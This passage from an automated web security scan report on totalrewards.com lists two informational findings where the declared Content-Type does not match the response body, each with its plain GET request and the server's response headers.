9.2. http://www.totalrewards.com/images/consumer/Flash/Videos/HomePageFlash.xml  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.totalrewards.com
Path:   /images/consumer/Flash/Videos/HomePageFlash.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains XML. However, it actually appears to contain plain text.

Request

GET /images/consumer/Flash/Videos/HomePageFlash.xml HTTP/1.1
Host: www.totalrewards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; mercury=Y; PZN_userRecommendationType=E;

Response

HTTP/1.1 200 OK
Content-Length: 5815
Content-Type: text/xml
Last-Modified: Wed, 26 Jan 2011 16:50:29 GMT
Accept-Ranges: bytes
ETag: "80b83b2379bdcb1:1d8f"
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
Date: Sat, 19 Mar 2011 13:52:09 GMT
Connection: close

<xgen id="Homepage Flash" type="Hero Flash">
   <externalSwf src="CAC_RS2" copy="The Greatest Day" hRef="http://www.totalrewards.com/brands/caesars/hotel-casinos/caesars-brand.shtml?rd=hcomfla
...[SNIP]...

9.3. http://www.totalrewards.com/xml/packages/undefined.xml  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.totalrewards.com
Path:   /xml/packages/undefined.xml

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /xml/packages/undefined.xml HTTP/1.1
Host: www.totalrewards.com
Proxy-Connection: keep-alive
Referer: http://www.totalrewards.com/index.shtml?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pzn_cookie=%5Bp_pzB%5D%5Bm_pzB%5D; PZN_userRecommendationType=E; mercury=Y

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sat, 19 Mar 2011 13:44:30 GMT
Server: Microsoft-IIS/6.0
p3p: CP="DEVa TAIa CURa STA NAV COM PUR ADMa IND OUR CONa"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html

<root>404</root>

Report generated by XSS.CX at Sat Mar 19 09:34:01 CDT 2011.